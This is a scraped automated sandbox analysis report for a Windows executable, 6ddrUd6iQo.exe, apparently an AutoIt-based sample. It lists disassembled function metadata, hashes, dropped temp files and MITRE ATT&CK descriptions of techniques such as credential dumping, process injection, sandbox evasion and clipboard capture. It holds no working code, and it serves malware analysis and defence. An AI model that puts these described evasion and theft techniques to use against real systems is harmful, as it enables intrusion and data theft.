Opcode Fuzzy Hash: 471b8c83a94d446e8d552368dd72251ac21f8c005fd35944a28888f048a1de0c
Instruction Fuzzy Hash: 2B01A771A41229BBCB16E7A0D982FFF77AC9F11300F240527B81267681DB155E189671

Function 002F6DAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 002F6DD0
__calloc_crt.LIBCMT ref: 002F6DE9

Strings

@R9, xrefs: 002F6E00

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: __calloc_crt
String ID: @R9
API String ID: 3494438863-1481892620
Opcode ID: 7b814ffef5cf323d5ebddea3cd368731ade6a4979e9929495ab48ceac2a6176d
Instruction ID: 03da976999b72d0a0c20dfc8eade9dfc31e9089aed083ccd049281cbeed6bad8
Opcode Fuzzy Hash: 7b814ffef5cf323d5ebddea3cd368731ade6a4979e9929495ab48ceac2a6176d
Instruction Fuzzy Hash: E4F0627632971B9FF725DF28BD06A71A799E7407A0F100937E340CA190EB7188918B80

Function 003351CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 003351E8
_wcscmp.LIBCMT ref: 003351FA

Strings

#32770, xrefs: 003351F4

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 90e1d1bb5b87fbc3c9522a4dcca160020bbd612fe8ace63d2b56780f79efe260
Instruction ID: dc4de7abd2a081e502cd12e00723fb835bc64d668dc66e261e0c65cf0560a892
Opcode Fuzzy Hash: 90e1d1bb5b87fbc3c9522a4dcca160020bbd612fe8ace63d2b56780f79efe260
Instruction Fuzzy Hash: 77E06833A0032C2BE320EA99AC49FA7F7ACEB45771F01006BFD10D3050E5609A048BE0

Function 003281BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003281CA

Part of subcall function 002F3598: _doexit.LIBCMT ref: 002F35A2

Strings

Error allocating memory., xrefs: 003281C3
AutoIt, xrefs: 003281BE

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: d53682caf5054ef932ac87a524f2bb706f34c0469cc7c407efba1c95737f3dd6
Instruction ID: 8e1487c18b7331c24af072f1fbf9764555bc2dc405a58172eec3aad238d14a03
Opcode Fuzzy Hash: d53682caf5054ef932ac87a524f2bb706f34c0469cc7c407efba1c95737f3dd6
Instruction Fuzzy Hash: 0ED05B323D532C36D21673A56C07FDA75484B19B52F444026FF08555D38DD159A146D9

Function 0030B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0030B564: _memset.LIBCMT ref: 0030B571

Part of subcall function 002F0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(00395158,00000000,00395144,0030B540,?,?,?,002D100A), ref: 002F0B89

IsDebuggerPresent.KERNEL32(?,?,?,002D100A), ref: 0030B544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,002D100A), ref: 0030B553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0030B54E

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: fc4a2a0c7e5db2a3463211bcf36e4d0e2185c757b1d087527ce5e1fa33c114f4
Instruction ID: 33082debf2f9875170818c2f3cfd94d7ea49f965d087c8a798a294b765dd37ea
Opcode Fuzzy Hash: fc4a2a0c7e5db2a3463211bcf36e4d0e2185c757b1d087527ce5e1fa33c114f4
Instruction Fuzzy Hash: 61E06DB42017108FD722DF28D814742BBE4AB00745F04896DE486C77A1E7B8D404CB61

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 6ddrUd6iQo.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\167FdO256

C:\Users\user\AppData\Local\Temp\Halitherses

C:\Users\user\AppData\Local\Temp\aut207F.tmp

C:\Users\user\AppData\Local\Temp\aut20BF.tmp

C:\Users\user\AppData\Local\Temp\bankrupture

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
6ddrUd6iQo.exe

Function 002D3B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 002D3633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
timewindowregistryCOMMON

Function 002D4AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 002D4FE9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62
COMMON

Function 003393DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 002D71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 002D3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 002D3778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Function 002D3015 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 71
registrywindowclipboardCOMMON

Function 002D3041 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 54
registrywindowclipboardCOMMON

Function 002DF8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Function 018F25F0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 002D39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre